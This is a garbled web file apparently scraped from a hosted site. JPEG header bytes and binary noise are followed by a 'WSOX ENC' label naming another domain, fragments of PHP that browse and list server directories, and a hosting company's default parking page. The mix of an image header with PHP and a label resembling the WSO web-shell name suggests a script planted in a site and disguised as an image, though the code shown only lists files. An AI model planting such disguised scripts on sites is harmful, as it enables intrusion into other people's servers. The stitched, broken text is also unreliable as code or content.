���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC $file, 'isdir' => $isdir, 'size' => $isdir ? 0 : filesize($path . $file), 'time' => filemtime($path . $file)); if ($isdir) $ls_d[] = $item; else $ls[] = $item; $_total++; $_total_size += $item['size']; } return array_merge($ls_d, $ls); } // Get the list of files $items = ls('.' . (empty($_browse) ? '' : '/' . $_browse), $showDirectories, $showHiddenFiles); // Sort it function sortByName($a, $b) { global $showDirectoriesFirst; return ($a['isdir'] == $b['isdir'] || !$showDirectoriesFirst ? strtolower($a['name']) > strtolower($b['name']) : $a['isdir'] < $b['isdir']) ? 1 : -1; } function sortBySize($a, $b) { return ($a['isdir'] == $b['isdir'] ? $a['size'] > $b['size'] : $a['isdir'] < $b['isdir']) ? 1 : -1; } function sortByTime($a, $b) { return ($a['time'] > $b['time']) ? 1 : -1; } switch (@$_GET['s']) { case 'size': $_sort = 'size'; usort($items, 'sortBySize'); break; case 'time': $_sort = 'time'; usort($items, 'sortByTime'); break; default : $_sort = 'name'; usort($items, 'sortByName'); break; } // Reverse? $_sort_reverse = (@$_GET['r'] == '1'); if ($_sort_reverse) $items = array_reverse($items); // Add parent if ($showParent && $_path != '/' && empty($_browse)) array_unshift($items, array( 'name' => '..', 'isparent' => true, 'isdir' => true, 'size' => 0, 'time' => 0 )); // Add parent in case of browsing a sub-folder if (!empty($_browse)) array_unshift($items, array( 'name' => '..', 'isparent' => false, 'isdir' => true, 'size' => 0, 'time' => 0 )); // 37.6 MB is better than 39487001 function humanizeFilesize($val, $round = 0) { $unit = array('','K','M','G','T','P','E','Z','Y'); do { $val /= 1024; array_shift($unit); } while ($val >= 1000); return sprintf('%.'.intval($round).'f', $val) . ' ' . array_shift($unit) . 'B'; } // Titles parser function getTitleHTML($title, $breadcrumbs = false) { global $_path, $_browse, $_total, $_total_size, $sizeDecimals; $title = htmlentities(str_replace(array('{{files}}', '{{size}}'), array($_total, humanizeFilesize($_total_size, $sizeDecimals)), $title)); $path = htmlentities($_path); if ($breadcrumbs) $path = sprintf('%s', htmlentities(buildLink(array('b' => ''))), $path); if (!empty($_browse)) { if ($_path != '/') $path .= '/'; $browseArray = explode('/', trim($_browse, '/')); foreach ($browseArray as $i => $part) { if ($breadcrumbs) { $path .= sprintf('%s', htmlentities(buildLink(array('b' => implode('/', array_slice($browseArray, 0, $i + 1))))), htmlentities($part)); } else { $path .= htmlentities($part); } if (count($browseArray) > ($i + 1)) $path .= '/'; } } return str_replace('{{path}}', $path, $title); } // Link builder function buildLink($changes) { global $_self; $params = $_GET; foreach ($changes as $k => $v) if (is_null($v)) unset($params[$k]); else $params[$k] = $v; foreach ($params as $k => $v) $params[$k] = urlencode($k) . '=' . urlencode($v); return empty($params) ? $_self : $_self . '?' . implode('&', $params); } ?> Hostever by Code For Host,Ins Parking Page
 
Hostever | Domain Registration and Transfer, Web Hosting, SSL certificates
Your webspace is ready to be live!

Welcome to the home of

Congratulations! Your hosting account has been successfully created on the server! Your nameservers have been setup properly and DNS propagation is completed. Now you may upload the content for your future site. To change this page, upload your website into the public_html directory.
  • substr($_browse, 0, strrpos($_browse, '/')))); } else { $itemURL = buildLink(array('b' => (empty($_browse) ? '' : (string)$_browse . '/') . $item['name'])); } } else { $itemURL = (empty($_browse) ? '' : str_replace(['%2F', '%2f'], '/', rawurlencode((string)$_browse)) . '/') . rawurlencode($item['name']); } ?>

Please find some useful links below

© Hostever | A Global Domain, Web Hosting & others Web Services Company